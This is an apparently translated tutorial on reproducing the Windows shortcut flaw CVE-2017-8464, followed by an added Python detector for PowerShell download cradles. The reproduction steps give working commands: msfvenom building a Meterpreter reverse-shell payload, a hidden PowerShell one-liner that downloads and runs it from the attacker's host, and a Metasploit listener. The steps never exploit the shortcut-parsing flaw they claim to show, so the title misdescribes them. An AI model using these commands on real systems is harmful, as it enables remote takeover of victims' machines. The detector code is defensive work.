2025-02-22 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article describes how to reproduce the remote command execution vulnerability CVE-2017-8464.
0x00 Vulnerability overview
An attacker can present to the user a removable drive or remote share that contains malicious .LNK files and associated malicious binaries. When a user opens this drive (or remote share) in Windows Explorer or any other application that parses a .LNK file, the malicious binary executes code of the attacker's choice on the target system, and an attacker who successfully exploits this vulnerability can gain the same user privileges as the local user. Note: .LNK is the file extension of application shortcut files on Windows.
Windows has a high-risk remote arbitrary code execution vulnerability in the way it parses shortcuts. Attackers can trigger the vulnerability through USB drives, network shares and other means to take full control of the user's system, so the security risk is high.
0x01 Affected versions
Microsoft Windows 10 Version 1607 for 32-bit Systems
Microsoft Windows 10 Version 1607 for x64-based Systems
Microsoft Windows 10 for 32-bit Systems
Microsoft Windows 10 for x64-based Systems
Microsoft Windows 10 version 1511 for 32-bit Systems
Microsoft Windows 10 version 1511 for x64-based Systems
Microsoft Windows 10 version 1703 for 32-bit Systems
Microsoft Windows 10 version 1703 for x64-based Systems
Microsoft Windows 7 for 32-bit Systems SP1
Microsoft Windows 7 for x64-based Systems SP1
Microsoft Windows 8.1 for 32-bit Systems
Microsoft Windows 8.1 for x64-based Systems
Microsoft Windows RT 8.1
Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1
Microsoft Windows Server 2008 R2 for x64-based Systems SP1
Microsoft Windows Server 2008 for 32-bit Systems SP2
Microsoft Windows Server 2008 for Itanium-based Systems SP2
Microsoft Windows Server 2008 for x64-based Systems SP2
Microsoft Windows Server 2012
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2016
0x02 Environment setup
Victim: Windows Server 2008 R2
Attacker machine: Kali
1. Download a vulnerable version of the system image from MSDN and install the image in a VMware virtual machine
MSDN download address: https://msdn.itellyou.cn/
2. After the download is complete, use VMware to install the virtual machine. Note: for the installation method, search Baidu
0x03 Vulnerability reproduction
1. Open Kali and use msfvenom to generate a PowerShell (ps1) shell
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.3.6 lport=9999 -f psh-reflection > /root/test/shell.ps1
2. Copy the generated shell.ps1 to the /var/www/html directory, and then start the Apache service. The shell.ps1 file can then be accessed directly in the browser.
cp shell.ps1 /var/www/html
service apache2 start
3. On the victim machine, right-click on the desktop and create a shortcut that runs powershell.exe with the following command
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.6/shell.ps1');test.ps1"
4. In Kali, configure the listening module in msf and run it
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST xxx.xxx.xx.x
set lport 9999
run
5. Once the listener is configured and running, when the victim runs the PowerShell shortcut that was just created, Kali receives the reverse shell.
0x04 Remediation recommendations
1. It is recommended that you install the official patch
2. Install protection software
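A detection-side complement to the recommendations above, as an added example that is not part of the original article: this Python sketch flags process or shortcut command lines that combine the traits of the step 3 command (hidden window or execution-policy bypass, a web download, and in-memory execution). The function names and every sample line except the first are constructed for illustration.

```python
import re

CRADLE = re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest", re.I)
IN_MEMORY = re.compile(r"\biex\b|invoke-expression", re.I)
URL = re.compile(r"https?://[^\s'\"()]+", re.I)

def _abbrev(param, full, min_len):
    # powershell.exe accepts shortened parameter names such as -w or -exec.
    return len(param) >= min_len and full.startswith(param)

def analyze(cmdline):
    """Collect indicators from one command line (process event or shortcut target)."""
    f = {"hidden_window": False, "policy_bypass": False,
         "download": False, "in_memory_exec": False, "urls": []}
    if not re.search(r"\bpowershell\b", cmdline, re.I):
        return f
    tokens = cmdline.lower().split()
    for tok, nxt in zip(tokens, tokens[1:] + [""]):
        if not tok.startswith(("-", "/")):
            continue
        param, value = tok[1:], nxt.strip("'\"")
        if _abbrev(param, "windowstyle", 1) and value == "hidden":
            f["hidden_window"] = True
        if (param == "ep" or _abbrev(param, "executionpolicy", 2)) \
                and value in ("bypass", "unrestricted"):
            f["policy_bypass"] = True
    f["download"] = bool(CRADLE.search(cmdline))
    f["in_memory_exec"] = bool(IN_MEMORY.search(cmdline))
    f["urls"] = URL.findall(cmdline)
    return f

def is_suspicious(cmdline):
    # Alert only on the combination: remote fetch + in-memory execution + concealment.
    f = analyze(cmdline)
    return f["download"] and f["in_memory_exec"] and (f["hidden_window"] or f["policy_bypass"])

# Constructed sample events; the first is the shortcut command from step 3.
SAMPLES = [
    r'''powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.3.6/shell.ps1');test.ps1"''',
    r'''powershell.exe -w hidden -ep bypass -c "iex (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"''',
    r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"notepad.exe C:\notes.txt",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print("ALERT" if is_suspicious(line) else "ok   ", analyze(line)["urls"], line[:60])
```

The third sample shows why the rule requires the combination: an administrative script that only bypasses the execution policy is recorded but does not alert.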
The above is how to reproduce the remote command execution vulnerability CVE-2017-8464. If you have similar questions, refer to the analysis above.